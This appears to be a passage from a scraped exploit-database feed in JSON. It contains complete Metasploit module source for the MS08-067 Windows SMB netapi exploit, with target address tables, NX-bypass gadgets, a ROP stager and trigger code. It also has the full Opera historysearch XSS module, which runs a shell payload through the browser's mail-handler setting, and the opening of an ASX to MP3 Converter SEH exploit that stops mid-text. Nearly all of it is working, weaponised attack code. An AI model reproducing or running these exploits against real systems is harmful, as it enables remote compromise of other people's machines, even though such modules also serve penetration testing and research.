'DisableNX' => 0x6fd717c2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP3 Dutch (NX)',\n {\n 'Ret' => 0x596cf807,\n 'DisableNX' => 0x596d17c2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP3 Norwegian (NX)',\n {\n 'Ret' => 0x597cf807,\n 'DisableNX' => 0x597d17c2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP3 Polish (NX)',\n {\n 'Ret' => 0x5941f807,\n 'DisableNX' => 0x594217c2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP3 Portuguese - Brazilian (NX)',\n {\n 'Ret' => 0x596ff807,\n 'DisableNX' => 0x597017c2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP3 Portuguese (NX)',\n {\n 'Ret' => 0x596bf807,\n 'DisableNX' => 0x596c17c2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP3 Russian (NX)',\n {\n 'Ret' => 0x6fe1f807,\n 'DisableNX' => 0x6fe217c2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP3 Swedish (NX)',\n {\n 'Ret' => 0x597af807,\n 'DisableNX' => 0x597b17c2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP3 Turkish (NX)',\n {\n 'Ret' => 0x5a78f807,\n 'DisableNX' => 0x5a7917c2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n #\n # Windows 2003 Targets\n #\n\n # Standard return-to-ESI without NX bypass\n ['Windows 2003 SP1 English (NO NX)',\n {\n 'Ret' => 0x71bf21a2,\n 'Scratch' => 0x00020408,\n }\n ], # JMP ESI WS2HELP.DLL\n\n # Brett Moore's crafty NX bypass for 2003 SP1\n ['Windows 2003 SP1 English (NX)',\n {\n 'RetDec' => 0x7c90568c, # dec ESI, ret @SHELL32.DLL\n 'RetPop' => 0x7ca27cf4, # push ESI, pop EBP, ret @SHELL32.DLL\n 'JmpESP' => 0x7c86fed3, # jmp ESP @NTDLL.DLL\n 'DisableNX' => 0x7c83e413, # NX disable @NTDLL.DLL\n 'Scratch' => 0x00020408,\n }\n ],\n\n # Standard return-to-ESI without NX bypass\n ['Windows 2003 SP1 Japanese (NO NX)',\n {\n 'Ret' => 0x71a921a2,\n 'Scratch' => 0x00020408,\n }\n ], # JMP ESI WS2HELP.DLL\n\n # Standard return-to-ESI without NX bypass\n ['Windows 2003 SP1 Spanish (NO NX)',\n {\n 'Ret' => 0x71ac21a2,\n 'Scratch' => 0x00020408,\n }\n ], # JMP ESI WS2HELP.DLL\n\n # Brett Moore's crafty NX bypass for 2003 SP1\n ['Windows 2003 SP1 Spanish (NX)',\n {\n 'RetDec' => 0x7c90568c, # dec ESI, ret @SHELL32.DLL\n 'RetPop' => 0x7ca27cf4, # push ESI, pop EBP, ret @SHELL32.DLL\n 'JmpESP' => 0x7c86fed3, # jmp ESP @NTDLL.DLL\n 'DisableNX' => 0x7c83e413, # NX disable @NTDLL.DLL\n 'Scratch' => 0x00020408,\n }\n ],\n # Standard return-to-ESI without NX bypass\n # Added by Omar MEZRAG - 0xFFFFFF\n [ 'Windows 2003 SP1 French (NO NX)',\n {\n 'Ret' => 0x71ac1c40 ,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI WS2HELP.DLL\n\n # Brett Moore's crafty NX bypass for 2003 SP1\n # Added by Omar MEZRAG - 0xFFFFFF\n [ 'Windows 2003 SP1 French (NX)',\n {\n 'RetDec' => 0x7CA2568C, # dec ESI, ret @SHELL32.DLL\n 'RetPop' => 0x7CB47CF4, # push ESI, pop EBP, ret 4 @SHELL32.DLL\n 'JmpESP' => 0x7C98FED3, # jmp ESP @NTDLL.DLL\n 'DisableNX' => 0x7C95E413, # NX disable @NTDLL.DLL\n 'Scratch' => 0x00020408\n }\n ],\n\n # Standard return-to-ESI without NX bypass\n ['Windows 2003 SP2 English (NO NX)',\n {\n 'Ret' => 0x71bf3969,\n 'Scratch' => 0x00020408,\n }\n ], # JMP ESI WS2HELP.DLL\n\n # Brett Moore's crafty NX bypass for 2003 SP2\n ['Windows 2003 SP2 English (NX)',\n {\n 'RetDec' => 0x7c86beb8, # dec ESI, ret @NTDLL.DLL\n 'RetPop' => 0x7ca1e84e, # push ESI, pop EBP, ret @SHELL32.DLL\n 'JmpESP' => 0x7c86a01b, # jmp ESP @NTDLL.DLL\n 'DisableNX' => 0x7c83f517, # NX disable @NTDLL.DLL\n 'Scratch' => 0x00020408,\n }\n ],\n\n # Standard return-to-ESI without NX bypass\n ['Windows 2003 SP2 German (NO NX)',\n {\n 'Ret' => 0x71a03969,\n 'Scratch' => 0x00020408,\n }\n ], # JMP ESI WS2HELP.DLL\n\n # Brett Moore's crafty NX bypass for 2003 SP2\n ['Windows 2003 SP2 German (NX)',\n {\n 'RetDec' => 0x7c98beb8, # dec ESI, ret @NTDLL.DLL\n 'RetPop' => 0x7cb3e84e, # push ESI, pop EBP, ret @SHELL32.DLL\n 'JmpESP' => 0x7c98a01b, # jmp ESP @NTDLL.DLL\n 'DisableNX' => 0x7c95f517, # NX disable @NTDLL.DLL\n 'Scratch' => 0x00020408,\n }\n ],\n\n # Brett Moore's crafty NX bypass for 2003 SP2 (target by Anderson Bargas)\n [ 'Windows 2003 SP2 Portuguese - Brazilian (NX)',\n {\n 'RetDec' => 0x7c97beb8, # dec ESI, ret @NTDLL.DLL OK\n 'RetPop' => 0x7cb2e84e, # push ESI, pop EBP, ret @SHELL32.DLL OK\n 'JmpESP' => 0x7c97a01b, # jmp ESP @NTDLL.DLL OK\n 'DisableNX' => 0x7c94f517, # NX disable @NTDLL.DLL\n 'Scratch' => 0x00020408,\n }\n ],\n # Standard return-to-ESI without NX bypass\n ['Windows 2003 SP2 Spanish (NO NX)',\n {\n 'Ret' => 0x71ac3969,\n 'Scratch' => 0x00020408,\n }\n ], # JMP ESI WS2HELP.DLL\n\n # Brett Moore's crafty NX bypass for 2003 SP2\n ['Windows 2003 SP2 Spanish (NX)',\n {\n 'RetDec' => 0x7c86beb8, # dec ESI, ret @NTDLL.DLL\n 'RetPop' => 0x7ca1e84e, # push ESI, pop EBP, ret @SHELL32.DLL\n 'JmpESP' => 0x7c86a01b, # jmp ESP @NTDLL.DLL\n 'DisableNX' => 0x7c83f517, # NX disable @NTDLL.DLL\n 'Scratch' => 0x00020408,\n }\n ],\n\n # Standard return-to-ESI without NX bypass\n # Provided by Masashi Fujiwara\n ['Windows 2003 SP2 Japanese (NO NX)',\n {\n 'Ret' => 0x71a91ed2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI WS2HELP.DLL\n # Standard return-to-ESI without NX bypass\n # Added by Omar MEZRAG - 0xFFFFFF\n [ 'Windows 2003 SP2 French (NO NX)',\n {\n 'Ret' => 0x71AC2069,\n 'Scratch' => 0x00020408\n }\n ], # CALL ESI WS2HELP.DLL\n\n # Brett Moore's crafty NX bypass for 2003 SP2\n # Added by Omar MEZRAG - 0xFFFFFF\n [ 'Windows 2003 SP2 French (NX)',\n {\n 'RetDec' => 0x7C98BEB8, # dec ESI, ret @NTDLL.DLL\n 'RetPop' => 0x7CB3E84E, # push ESI, pop EBP, ret @SHELL32.DLL\n 'JmpESP' => 0x7C98A01B, # jmp ESP @NTDLL.DLL\n 'DisableNX' => 0x7C95F517, # NX disable @NTDLL.DLL\n 'Scratch' => 0x00020408\n }\n ],\n\n #\n # Missing Targets\n # Key: T=TODO ?=UNKNOWN U=UNRELIABLE\n #\n # [?] Windows Vista SP0 - Not tested yet\n # [?] Windows Vista SP1 - Not tested yet\n #\n ],\n\n 'DisclosureDate' => 'Oct 28 2008'))\n\n register_options(\n [\n OptString.new('SMBPIPE', [true, 'The pipe name to use (BROWSER, SRVSVC)', 'BROWSER']),\n ])\n end\n\n #\n #\n # *** WINDOWS XP SP2/SP3 TARGETS ***\n #\n #\n # This exploit bypasses NX/NX by returning to a function call inside acgenral.dll that disables NX\n # for the process and then returns back to a call ESI instruction. These addresses are different\n # between operating systems, service packs, and language packs, but the steps below can be used to\n # add new targets.\n #\n #\n # If the target system does not have NX/NX, just place a \"call ESI\" return into both the Ret\tand\n # DisableNX elements of the target hash.\n #\n # If the target system does have NX/NX, obtain a copy of the acgenral.dll from that system.\n # First obtain the value for the Ret element of the hash with the following command:\n #\n # $ msfpescan -j esi acgenral.dll\n #\n # Pick whatever address you like, just make sure it does not contain 00 0a 0d 5c 2f or 2e.\n #\n # Next, find the location of the function we use to disable NX. Use the following command:\n #\n # $ msfpescan -r \"\\x6A\\x04\\x8D\\x45\\x08\\x50\\x6A\\x22\\x6A\\xFF\" acgenral.dll\n #\n # This address should be placed into the DisableNX element of the target hash.\n #\n # The Scratch element of 0x00020408 should work on all versions of Windows\n #\n # The actual function we use to disable NX looks like this:\n #\n # push 4\n # lea eax, [ebp+arg_0]\n # push eax\n # push 22h\n # push 0FFFFFFFFh\n # mov [ebp+arg_0], 2\n # call ds:__imp__NtSetInformationProcess@16\n #\n #\n # *** WINDOWS XP NON-NX TARGETS ***\n #\n #\n # Instead of bypassing NX, just return directly to a \"JMP ESI\", which takes us to the short\n # jump, and finally the shellcode.\n #\n #\n # *** WINDOWS 2003 SP2 TARGETS ***\n #\n #\n # There are only two possible ways to return to NtSetInformationProcess on Windows 2003 SP2,\n # both of these are inside NTDLL.DLL and use a return method that is not directly compatible\n # with our call stack. To solve this, Brett Moore figured out a multi-step return call chain\n # that eventually leads to the NX bypass function.\n #\n #\n # *** WINDOWS 2000 TARGETS ***\n #\n #\n # No NX to bypass, just return directly to a \"JMP EDX\", which takes us to the short\n # jump, and finally the shellcode.\n #\n #\n # *** WINDOWS VISTA TARGETS ***\n #\n # Currently untested, will involve ASLR and NX, should be fun.\n #\n #\n # *** NetprPathCanonicalize IDL ***\n #\n #\n # NET_API_STATUS NetprPathCanonicalize(\n # [in, string, unique] SRVSVC_HANDLE ServerName,\n # [in, string] WCHAR* PathName,\n # [out, size_is(OutbufLen)] unsigned char* Outbuf,\n # [in, range(0,64000)] DWORD OutbufLen,\n # [in, string] WCHAR* Prefix,\n # [in, out] DWORD* PathType,\n # [in] DWORD Flags\n # );\n #\n\n def exploit\n begin\n connect\n smb_login\n rescue Rex::Proto::SMB::Exceptions::LoginError => e\n if e.message =~ /Connection reset/\n print_error('Connection reset during login')\n print_error('This most likely means a previous exploit attempt caused the service to crash')\n return\n else\n raise e\n end\n end\n\n # Use a copy of the target\n mytarget = target\n\n if target['auto']\n\n mytarget = nil\n\n print_status('Automatically detecting the target...')\n fprint = smb_fingerprint\n\n print_status(\"Fingerprint: #{fprint['os']} - #{fprint['sp']} - lang:#{fprint['lang']}\")\n\n # Bail early on unknown OS\n if (fprint['os'] == 'Unknown')\n fail_with(Failure::NoTarget, 'No matching target')\n end\n\n # Windows 2000 is mostly universal\n if (fprint['os'] == 'Windows 2000')\n mytarget = targets[1]\n end\n\n # Windows XP SP0/SP1 is mostly universal\n if fprint['os'] == 'Windows XP' and fprint['sp'] == 'Service Pack 0 / 1'\n mytarget = targets[2]\n end\n\n # Windows 2003 SP0 is mostly universal\n if fprint['os'] == 'Windows 2003' and fprint['sp'].empty?\n mytarget = targets[3]\n end\n\n # Windows 2003 R2 is treated the same as 2003\n if (fprint['os'] == 'Windows 2003 R2')\n fprint['os'] = 'Windows 2003'\n end\n\n # Service Pack match must be exact\n if (not mytarget) and fprint['sp'].index('+')\n print_error('Could not determine the exact service pack')\n print_error(\"Auto-targeting failed, use 'show targets' to manually select one\")\n disconnect\n return\n end\n\n # Language Pack match must be exact or we default to English\n if (not mytarget) and fprint['lang'] == 'Unknown'\n print_status('We could not detect the language pack, defaulting to English')\n fprint['lang'] = 'English'\n end\n\n # Normalize the service pack string\n fprint['sp'].gsub!(/Service Pack\\s+/, 'SP')\n\n unless mytarget\n targets.each do |t|\n # Prefer AlwaysOn NX over NX, and NX over non-NX\n if t.name =~ /#{fprint['os']} #{fprint['sp']} #{fprint['lang']} \\(AlwaysOn NX\\)/\n mytarget = t\n break\n end\n if t.name =~ /#{fprint['os']} #{fprint['sp']} #{fprint['lang']} \\(NX\\)/\n mytarget = t\n break\n end\n end\n end\n\n unless mytarget\n fail_with(Failure::NoTarget, 'No matching target')\n end\n\n print_status(\"Selected Target: #{mytarget.name}\")\n end\n\n #\n # Build the malicious path name\n #\n\n padder = [*('A'..'Z')]\n pad = 'A'\n while pad.length < 7\n c = padder[rand(padder.length)]\n next if pad.index(c)\n pad += c\n end\n\n prefix = '\\\\'\n path = ''\n server = Rex::Text.rand_text_alpha(rand(8) + 1).upcase\n\n #\n # Windows 2003 SP2 (NX) targets\n #\n if mytarget['RetDec']\n\n jumper = Rex::Text.rand_text_alpha(70).upcase\n jumper[ 0, 4] = [mytarget['RetDec']].pack('V') # one more to Align and make room\n\n jumper[ 4, 4] = [mytarget['RetDec']].pack('V') # 4 more for space\n jumper[ 8, 4] = [mytarget['RetDec']].pack('V')\n jumper[ 12, 4] = [mytarget['RetDec']].pack('V')\n jumper[ 16, 4] = [mytarget['RetDec']].pack('V')\n\n jumper[ 20, 4] = [mytarget['RetPop']].pack('V') # pop to EBP\n jumper[ 24, 4] = [mytarget['DisableNX']].pack('V')\n\n jumper[ 56, 4] = [mytarget['JmpESP']].pack('V')\n jumper[ 60, 4] = [mytarget['JmpESP']].pack('V')\n jumper[ 64, 2] = \"\\xeb\\x02\" # our jump\n jumper[ 68, 2] = \"\\xeb\\x62\" # original\n\n path =\n Rex::Text.to_unicode('\\\\') +\n\n # This buffer is removed from the front\n Rex::Text.rand_text_alpha(100) +\n\n # Shellcode\n payload.encoded +\n\n # Relative path to trigger the bug\n Rex::Text.to_unicode('\\\\..\\\\..\\\\') +\n\n # Extra padding\n Rex::Text.to_unicode(pad) +\n\n # Writable memory location (static)\n [mytarget['Scratch']].pack('V') + # EBP\n\n # Return to code which disables NX (or just the return)\n [mytarget['RetDec']].pack('V') +\n\n # Padding with embedded jump\n jumper +\n\n # NULL termination\n \"\\x00\" * 2\n\n #\n # Windows XP SP2/SP3 ROP Stager targets\n #\n elsif mytarget['UseROP']\n\n rop = generate_rop(mytarget['UseROP'])\n\n path =\n Rex::Text.to_unicode('\\\\') +\n\n # This buffer is removed from the front\n Rex::Text.rand_text_alpha(100) +\n\n # Shellcode\n payload.encoded +\n\n # Relative path to trigger the bug\n Rex::Text.to_unicode('\\\\..\\\\..\\\\') +\n\n # Extra padding\n Rex::Text.to_unicode(pad) +\n\n # ROP Stager\n rop +\n\n # Padding (skipped)\n Rex::Text.rand_text_alpha(2) +\n\n # NULL termination\n \"\\x00\" * 2\n\n #\n # Windows 2000, XP (NX), and 2003 (NO NX) targets\n #\n else\n\n jumper = Rex::Text.rand_text_alpha(70).upcase\n jumper[ 4, 4] = [mytarget.ret].pack('V')\n jumper[50, 8] = make_nops(8)\n jumper[58, 2] = \"\\xeb\\x62\"\n\n path =\n Rex::Text.to_unicode('\\\\') +\n\n # This buffer is removed from the front\n Rex::Text.rand_text_alpha(100) +\n\n # Shellcode\n payload.encoded +\n\n # Relative path to trigger the bug\n Rex::Text.to_unicode('\\\\..\\\\..\\\\') +\n\n # Extra padding\n Rex::Text.to_unicode(pad) +\n\n # Writable memory location (static)\n [mytarget['Scratch']].pack('V') + # EBP\n\n # Return to code which disables NX (or just the return)\n [mytarget['DisableNX'] || mytarget.ret].pack('V') +\n\n # Padding with embedded jump\n jumper +\n\n # NULL termination\n \"\\x00\" * 2\n\n end\n\n handle = dcerpc_handle(\n '4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0',\n 'ncacn_np', [\"\\\\#{datastore['SMBPIPE']}\"]\n )\n\n dcerpc_bind(handle)\n\n stub =\n NDR.uwstring(server) +\n NDR.UnicodeConformantVaryingStringPreBuilt(path) +\n NDR.long(rand(1024)) +\n NDR.wstring(prefix) +\n NDR.long(4097) +\n NDR.long(0)\n\n # NOTE: we don't bother waiting for a response here...\n print_status('Attempting to trigger the vulnerability...')\n dcerpc.call(0x1f, stub, false)\n\n # Cleanup\n handler\n disconnect\n end\n\n def check\n begin\n connect\n smb_login\n rescue Rex::ConnectionError => e\n vprint_error(\"Connection failed: #{e.class}: #{e}\")\n return Msf::Exploit::CheckCode::Unknown\n rescue Rex::Proto::SMB::Exceptions::LoginError => e\n if e.message =~ /Connection reset/\n vprint_error('Connection reset during login')\n vprint_error('This most likely means a previous exploit attempt caused the service to crash')\n return Msf::Exploit::CheckCode::Unknown\n else\n raise e\n end\n end\n\n #\n # Build the malicious path name\n # 5b878ae7 \"db @eax;g\"\n prefix = '\\\\'\n path =\n \"\\x00\\\\\\x00/\" * 0x10 +\n Rex::Text.to_unicode('\\\\') +\n Rex::Text.to_unicode('R7') +\n Rex::Text.to_unicode('\\\\..\\\\..\\\\') +\n Rex::Text.to_unicode('R7') +\n \"\\x00\" * 2\n\n server = Rex::Text.rand_text_alpha(rand(8) + 1).upcase\n\n handle = dcerpc_handle('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0',\n 'ncacn_np', [\"\\\\#{datastore['SMBPIPE']}\"]\n )\n\n begin\n # Samba doesn't have this handle and returns an ErrorCode\n dcerpc_bind(handle)\n rescue Rex::Proto::SMB::Exceptions::ErrorCode => e\n vprint_error(\"SMB error: #{e.message}\")\n return Msf::Exploit::CheckCode::Safe\n end\n\n vprint_status('Verifying vulnerable status... (path: 0x%08x)' % path.length)\n\n stub =\n NDR.uwstring(server) +\n NDR.UnicodeConformantVaryingStringPreBuilt(path) +\n NDR.long(8) +\n NDR.wstring(prefix) +\n NDR.long(4097) +\n NDR.long(0)\n\n resp = dcerpc.call(0x1f, stub)\n error = resp[4, 4].unpack('V')[0]\n\n # Cleanup\n simple.client.close\n simple.client.tree_disconnect\n disconnect\n\n if (error == 0x0052005c) # \\R :)\n return Msf::Exploit::CheckCode::Vulnerable\n else\n vprint_error('System is not vulnerable (status: 0x%08x)' % error) if error\n return Msf::Exploit::CheckCode::Safe\n end\n end\n\n def generate_rop(version)\n free_byte = \"\\x90\"\n # free_byte = \"\\xcc\"\n\n # create a few small gadgets\n # <free byte>; pop edx; pop ecx; ret\n gadget1 = free_byte + \"\\x5a\\x59\\xc3\"\n # mov edi, eax; add edi,0xc; push 0x40; pop ecx; rep movsd\n gadget2 = free_byte + \"\\x89\\xc7\" + \"\\x83\\xc7\\x0c\" + \"\\x6a\\x7f\" + \"\\x59\" + \"\\xf2\\xa5\" + free_byte\n # <must complete \\x00 two byte opcode>; <free_byte>; jmp $+0x5c\n gadget3 = \"\\xcc\" + free_byte + \"\\xeb\\x5a\"\n\n # gadget2:\n # get eax into edi\n # adjust edi\n # get 0x7f in ecx\n # copy the data\n # jmp to it\n #\n dws = gadget2.unpack('V*')\n\n ##\n # Create the ROP stager, pfew.. Props to corelanc0d3r!\n # This was no easy task due to space limitations :-/\n # -jduck\n ##\n module_name = 'ACGENRAL.DLL'\n module_base = 0x6f880000\n\n rvasets = {}\n # XP SP2\n rvasets['5.1.2600.2180'] = {\n # call [imp_HeapCreate] / mov [0x6f8b8024], eax / ret\n 'call_HeapCreate' => 0x21064,\n 'add eax, ebp / mov ecx, 0x59ffffa8 / ret' => 0x2e546,\n 'pop ecx / ret' => 0x2e546 + 6,\n 'mov [eax], ecx / ret' => 0xd182,\n 'jmp eax' => 0x19b85,\n 'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret' => 0x10976,\n 'mov [eax+0x10], ecx / ret' => 0x10976 + 6,\n 'add eax, 8 / ret' => 0x29a14\n }\n\n # XP SP3\n rvasets['5.1.2600.5512'] = {\n # call [imp_HeapCreate] / mov [0x6f8b02c], eax / ret\n 'call_HeapCreate' => 0x21286,\n 'add eax, ebp / mov ecx, 0x59ffffa8 / ret' => 0x2e796,\n 'pop ecx / ret' => 0x2e796 + 6,\n 'mov [eax], ecx / ret' => 0xd296,\n 'jmp eax' => 0x19c6f,\n 'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret' => 0x10a56,\n 'mov [eax+0x10], ecx / ret' => 0x10a56 + 6,\n 'add eax, 8 / ret' => 0x29c64\n }\n\n # HeapCreate ROP Stager from ACGENRAL.DLL 5.1.2600.2180\n rop = [\n # prime ebp (adjustment distance)\n 0x00018000,\n\n # get some RWX memory via HeapCreate\n 'call_HeapCreate',\n 0x01040110, # flOptions (gets & with 0x40005)\n 0x01010101,\n 0x01010101,\n\n # adjust the returned pointer\n 'add eax, ebp / mov ecx, 0x59ffffa8 / ret',\n\n # setup gadget1\n 'pop ecx / ret',\n gadget1.unpack('V').first,\n 'mov [eax], ecx / ret',\n\n # execute gadget1\n 'jmp eax',\n\n # setup gadget2 (via gadget1)\n dws[0],\n dws[1],\n 'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret',\n\n # setup part3 of gadget2\n 'pop ecx / ret',\n dws[2],\n 'mov [eax+0x10], ecx / ret',\n\n # execute gadget2\n 'add eax, 8 / ret',\n 'jmp eax',\n\n # gadget3 gets executed after gadget2 (luckily)\n gadget3.unpack('V').first\n ]\n\n # convert the meta rop into concrete bytes\n rvas = rvasets[version]\n\n rop.map! { |e|\n if e.kind_of? String\n # Meta-replace (RVA)\n fail_with(Failure::BadConfig, \"Unable to locate key: \\\"#{e}\\\"\") unless rvas[e]\n module_base + rvas[e]\n\n elsif e == :unused\n # Randomize\n rand_text(4).unpack('V').first\n\n else\n # Literal\n e\n end\n }\n\n ret = rop.pack('V*')\n\n # check badchars?\n # idx = Rex::Text.badchar_index(ret, payload_badchars)\n\n ret\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/smb/ms08_067_netapi.rb"}, {"lastseen": "2019-11-20T21:02:39", "bulletinFamily": "exploit", "description": "Certain constructs are not escaped correctly by Opera's History Search results. These can be used to inject scripts into the page, which can then be used to modify configuration settings and execute arbitrary commands. Affects Opera versions between 9.50 and 9.61.\n", "modified": "2017-07-24T13:26:21", "published": "2009-07-21T15:20:35", "id": "MSF:EXPLOIT/MULTI/BROWSER/OPERA_HISTORYSEARCH", "href": "", "type": "metasploit", "title": "Opera historysearch XSS", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n #include Msf::Exploit::Remote::BrowserAutopwn\n #autopwn_info({\n # :ua_name => HttpClients::OPERA,\n # :javascript => true,\n # :rank => ExcellentRanking, # reliable command execution\n # :vuln_test => %Q{\n # v = parseFloat(opera.version());\n # if (9.5 < v && 9.62 > v) {\n # is_vuln = true;\n # }\n # },\n #})\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Opera historysearch XSS',\n 'Description' => %q{\n Certain constructs are not escaped correctly by Opera's History\n Search results. These can be used to inject scripts into the\n page, which can then be used to modify configuration settings\n and execute arbitrary commands. Affects Opera versions between\n 9.50 and 9.61.\n },\n 'License' => BSD_LICENSE,\n 'Author' =>\n [\n 'Roberto Suggi', # Discovered the vulnerability\n 'Aviv Raff <avivra[at]gmail.com>', # showed it to be exploitable for code exec\n 'egypt', # msf module\n ],\n 'References' =>\n [\n ['CVE', '2008-4696'],\n ['OSVDB', '49472'],\n ['BID', '31869'],\n ['URL', 'http://www.opera.com/support/kb/view/903/'],\n ],\n 'Payload' =>\n {\n 'EXITFUNC' => 'process',\n 'Space' => 4000,\n 'DisableNops' => true,\n 'BadChars' => \"\\x09\\x0a\\x0d\\x20\",\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'generic perl ruby telnet',\n }\n },\n 'Platform' => %w{ unix },\n 'Targets' =>\n [\n #[ 'Automatic', { } ],\n #[ 'Opera < 9.61 Windows',\n #\t{\n #\t\t'Platform' => 'win',\n #\t\t'Arch' => ARCH_X86,\n #\t}\n #],\n [ 'Opera < 9.61 Unix Cmd',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n }\n ],\n ],\n 'DisclosureDate' => 'Oct 23 2008', # Date of full-disclosure post showing code exec\n 'DefaultTarget' => 0\n ))\n end\n\n def on_request_uri(cli, request)\n\n headers = {}\n html_hdr = %Q^\n <html>\n <head>\n <title>Loading</title>\n ^\n html_ftr = %Q^\n </head>\n <body >\n <h1>Loading</h1>\n </body></html>\n ^\n\n case request.uri\n when /[?]jspayload/\n p = regenerate_payload(cli)\n if (p.nil?)\n send_not_found(cli)\n return\n end\n # We're going to run this through unescape(), so make sure\n # everything is encoded\n penc = Rex::Text.to_hex(p.encoded, \"%\")\n content =\n %Q{\n var s = document.createElement(\"iframe\");\n\n s.src=\"opera:config\";\n s.id=\"config_window\";\n document.body.appendChild(s);\n config_window.eval(\n \"var cmd = unescape('/bin/bash -c %22#{penc}%22 ');\" +\n \"old_app = opera.getPreference('Mail','External Application');\" +\n \"old_handler = opera.getPreference('Mail','Handler');\" +\n \"opera.setPreference('Mail','External Application',cmd);\" +\n \"opera.setPreference('Mail','Handler','2');\" +\n \"app_link = document.createElement('a');\" +\n \"app_link.setAttribute('href', 'mailto:a@b.com');\" +\n \"app_link.click();\" +\n \"setTimeout(function () {opera.setPreference('Mail','External Application',old_app)},0);\" +\n \"setTimeout(function () {opera.setPreference('Mail','Handler',old_handler)},0);\" +\n \"\");\n setTimeout(function () {window.location='about:blank'},1);\n }\n\n when /[?]history/\n js = %Q^\n window.onload = function() {\n location.href = \"opera:historysearch?q=*\";\n }\n ^\n content = %Q^\n #{html_hdr}\n <script><!--\n #{js}\n //--></script>\n #{html_ftr}\n ^\n when get_resource()\n print_status(\"Sending #{self.name} for request #{request.uri}\")\n\n js = %Q^\n if (window.opera) {\n var wnd = window;\n while (wnd.parent != wnd) {\n wnd = wnd.parent;\n }\n url = location.href;\n wnd.location = url + \"?history#<script src='\" + url +\"?\" + \"jspayload=1'/><!--\";\n }\n ^\n content = %Q^\n #{html_hdr}\n <script><!--\n #{js}\n //--></script>\n #{html_ftr}\n ^\n else\n print_status(\"Sending 404 for request #{request.uri}\")\n send_not_found(cli)\n return\n end\n content.gsub!(/^ {8}/, '')\n content.gsub!(/\\t/, ' ')\n\n send_response_html(cli, content, headers)\n handler(cli)\n end\nend\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/browser/opera_historysearch.rb"}], "zdt": [{"lastseen": "2018-04-12T19:46:55", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2010-07-13T00:00:00", "published": "2010-07-13T00:00:00", "id": "1337DAY-ID-13319", "href": "https://0day.today/exploit/description/13319", "type": "zdt", "title": "ASX to MP3 Converter v3.1.2.1 SEH (Multiple OS, DEP and ASLR Bypass)", "sourceData": "====================================================================\r\nASX to MP3 Converter v3.1.2.1 SEH (Multiple OS, DEP and ASLR Bypass)\r\n====================================================================\r\n\r\n\r\n# Exploit Title: ASX to MP3 Converter v3.1.2.1 SEH Exploit (Multiple OS, DEP and ASLR Bypass)\r\n# Date: July 13, 2010\r\n# Author: Node\r\n# Software Link: http://www.mini-stream.net/downloads/ASXtoMP3Converter.exe\r\n# Version: Mini-Stream Software ASX to MP3 Converter v3.1.2.1.2010.03.30 Evaluation\r\n# Tested on: Windows Vista Ultimate SP1 Eng\r\n# Windows Vista Ultimate SP2 Eng\r\n# Windows XP Pro SP3 Eng\r\n# Windows XP Pro SP2 Swe\r\n# Windows XP Pro SP3 Swe\r\n# Windows XP Home SP3 Swe\r\n# CVE :\r\n# Notes: This is a proof of concept that it is possible to write ROP exploits\r\n# that are portable to different operating systems. This exploit is\r\n# using the following variables:\r\n#\r\n# 1. \"Offset\": The offset to the SEH overwrite\r\n# 2. \"Offset2\": The offset before the ROP code starts in the buffer\r\n# 3. \"K32Offset\": The offset to the kernel32 pointer on the stack\r\n# 4. \"VPOffset\": The offset to VirtualProtect() from the grabbed\r\n# kernel32 address\r\n# 5. \"ASLR\": Activates or deactivates the ASLR bypassing ROP code\r\n#\r\n# The K32Offset and VPOffset are negged hex-numbers, to evade the\r\n# null-byte problem. In the first target, K32Offset is \"0xfffebcac\"\r\n# which gets converted in the ROP code to 0x00014354 (82772), which is\r\n# how much the saved ESP address needs to be subtracted, to point to\r\n# the kernel32 address. VPOffset is how much the Kernel32 address\r\n# needs 